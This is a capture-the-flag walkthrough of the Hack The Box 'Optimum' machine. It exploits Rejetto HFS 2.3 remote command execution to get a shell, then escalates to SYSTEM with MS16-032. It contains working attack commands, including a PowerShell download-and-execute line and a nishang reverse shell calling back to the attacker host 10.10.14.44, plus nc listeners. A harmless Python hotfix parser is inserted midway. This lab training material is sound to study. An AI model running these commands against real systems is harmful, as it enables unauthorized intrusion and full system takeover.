hackthebox optimum walkthrough

Starting with nmap

# nmap -sT -sC -sV 10.10.10.8 -oA optimum
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-17 10:02 EDT
Nmap scan report for 10.10.10.8
Host is up (0.17s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.70 seconds

Port 80 is running HFS (Rejetto HTTP File Server). If we try to log in we get an unauthorized error, as shown in the screenshot below.

[Screenshot: hackthebox – optimum – unauthorized]

Using searchsploit to check whether there are any known vulnerabilities for HFS

# searchsploit HFS | grep Remote
FHFS - FTP/HTTP File Server 2.1.2 Remote Command Execution                                              | exploits/windows/remote/37985.py
Rejetto HTTP File Server (HFS) - Remote Command Execution (Metasploit)                                  | exploits/windows/remote/34926.rb
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)                                     | exploits/windows/remote/34668.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)                                     | exploits/windows/remote/39161.py
Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Execution                                | exploits/windows/webapps/34852.txt

Copying one of the Remote Command Execution exploits into the working directory

# searchsploit -m exploits/windows/remote/39161.py

There are two things we should do before running the above Python script. First, change the IP address and port inside it; second, copy nc.exe to the current directory and start a Python HTTP server.

# cp /usr/share/windows-binaries/nc.exe ./
# python -m SimpleHTTPServer 80

Then run the script

# python 39161.py 10.10.10.8 80

We get a shell on the listener:

# nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.44] from (UNKNOWN) [10.10.10.8] 49162
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\kostas\Desktop>whoami
whoami
optimum\kostas

For privilege escalation we can gather some information using the systeminfo command.

C:\>systeminfo
systeminfo

Host Name:                 OPTIMUM
OS Name:                   Microsoft Windows Server 2012 R2 Standard
OS Version:                6.3.9600 N/A Build 9600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00252-70000-00000-AA535
Original Install Date:     18/3/2017, 1:51:36 ��
System Boot Time:          24/7/2019, 1:50:34 ��
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest
Total Physical Memory:     4.095 MB
Available Physical Memory: 3.476 MB
Virtual Memory: Max Size:  5.503 MB
Virtual Memory: Available: 4.928 MB
Virtual Memory: In Use:    575 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              \\OPTIMUM
Hotfix(s):                 31 Hotfix(s) Installed.
                           [01]: KB2959936
                           [02]: KB2896496
                           [03]: KB2919355
                           [04]: KB2920189
                           [05]: KB2928120
                           [06]: KB2931358
                           [07]: KB2931366
                           [08]: KB2933826
                           [09]: KB2938772
                           [10]: KB2949621
                           [11]: KB2954879
                           [12]: KB2958262
                           [13]: KB2958263
                           [14]: KB2961072
                           [15]: KB2965500
                           [16]: KB2966407
                           [17]: KB2967917
                           [18]: KB2971203
                           [19]: KB2971850
                           [20]: KB2973351
                           [21]: KB2973448
                           [22]: KB2975061
                           [23]: KB2976627
                           [24]: KB2977629
                           [25]: KB2981580
                           [26]: KB2987107
                           [27]: KB2989647
                           [28]: KB2998527
                           [29]: KB3000850
                           [30]: KB3003057
                           [31]: KB3014442
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) 82574L Gigabit Network Connection
                                 Connection Name: Ethernet0
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.8
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

We can save the output to a file and run it through Windows Exploit Suggester.

# ./windows-exploit-suggester.py --database 2019-07-17-mssb.xls  --systeminfo sysinfo.txt 

After this, we will see a few suggestions. Among them I like MS16-032.
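As an added example (not part of the original walkthrough and not the code of Windows Exploit Suggester), the following Python script parses systeminfo output in the format shown above, pulls out the installed hotfix list, checks it against the declared count, and reports which KBs from a required list are missing; it assumes a constructed excerpt of the listing above as input, and KB9999999 is a placeholder, not a real update.

```python
import re

# Constructed excerpt of the systeminfo output shown above (not the full listing).
SAMPLE_SYSTEMINFO = """\
Host Name:                 OPTIMUM
OS Name:                   Microsoft Windows Server 2012 R2 Standard
OS Version:                6.3.9600 N/A Build 9600
System Type:               x64-based PC
Hotfix(s):                 4 Hotfix(s) Installed.
                           [01]: KB2959936
                           [02]: KB2896496
                           [03]: KB2919355
                           [04]: KB3014442
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) 82574L Gigabit Network Connection
"""

FIELD_RE = re.compile(r"^([A-Za-z][^:]*?):\s*(.*)$")   # "Name: value" at column 0
KB_RE = re.compile(r"\bKB(\d{6,7})\b")                  # KB ids in the hotfix block


def parse_systeminfo(text):
    """Return (fields, hotfixes): top-level 'Name: value' pairs and the set of KB ids."""
    fields = {}
    hotfixes = set()
    in_hotfix_block = False
    for raw in text.splitlines():
        line = raw.rstrip()
        if not line:
            continue
        if not line.startswith(" "):          # unindented line starts a new top-level field
            m = FIELD_RE.match(line)
            if m:
                name, value = m.group(1).strip(), m.group(2).strip()
                fields[name] = value
                in_hotfix_block = name.startswith("Hotfix")
            continue
        if in_hotfix_block:                   # indented "[NN]: KBxxxxxxx" entries
            hotfixes.update("KB" + n for n in KB_RE.findall(line))
    return fields, hotfixes


def declared_hotfix_count(fields):
    """Number of hotfixes systeminfo claims are installed (None if the field is absent)."""
    m = re.match(r"(\d+)", fields.get("Hotfix(s)", ""))
    return int(m.group(1)) if m else None


def missing_hotfixes(installed, required):
    """KB ids from `required` that are not in the installed set, sorted."""
    return sorted(kb for kb in required if kb not in installed)
```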

We will use PowerShell here. For this, we first need to clone the Empire and nishang GitHub repos.

Copy Invoke-MS16032.ps1 from Empire…

# cp /opt/Empire/data/module_source/privesc/Invoke-MS16032.ps1 ./Invoke-MS16032.ps1

…and append the following line at the end of the file:

Invoke-MS16032 -Command "iex(New-Object Net.WebClient).DownloadString('http://10.10.14.44/shell.ps1')"

As you can see, the above line downloads and runs shell.ps1, so copy Invoke-PowerShellTcp.ps1 and rename it to shell.ps1:

# cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 ./shell.ps1

Append the following at the end of that file:

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.44 -Port 4444

We will serve these files using the Python HTTP server started earlier, so put them in the folder from which we ran it.

Now, from the previous shell, download the file Invoke-MS16032.ps1. I have to use wget.vbs here.

C:\Users\kostas\Desktop>cd %temp%
C:\Users\kostas\AppData\Local\Temp> cscript wget.vbs http://10.10.14.44/Invoke-MS16032.ps1 Invoke-MS16032.ps1

Listen on port 4444 for the shell:

# nc -lvnp 4444

It is necessary to use 64-bit PowerShell: if you just run the powershell command from this 32-bit shell, the 32-bit version will be loaded and you will not get the shell back as "nt authority". To use 64-bit PowerShell, use its full path. To be clear, if you use 32-bit PowerShell you will get an error like the following:

[!] No valid thread handles were captured, exiting!

Let’s continue

C:\Users\kostas\AppData\Local\Temp>C:\windows\sysnative\windowspowershell\v1.0\powershell "C:\Users\kostas\AppData\Local\Temp\Invoke-MS16032.ps1"
     __ __ ___ ___   ___     ___ ___ ___ 
    |  V  |  _|_  | |  _|___|   |_  |_  |
    |     |_  |_| |_| . |___| | |_  |  _|
    |_|_|_|___|_____|___|   |___|___|___|
                                        
                   [by b33f -> @FuzzySec]

[!] Holy handle leak Batman, we have a SYSTEM shell!!


C:\Users\kostas\AppData\Local\Temp>

In the other window, we get the shell:

# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.44] from (UNKNOWN) [10.10.10.8] 49190
Windows PowerShell running as user OPTIMUM$ on OPTIMUM
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Users\kostas\AppData\Local\Temp>whoami
nt authority\system
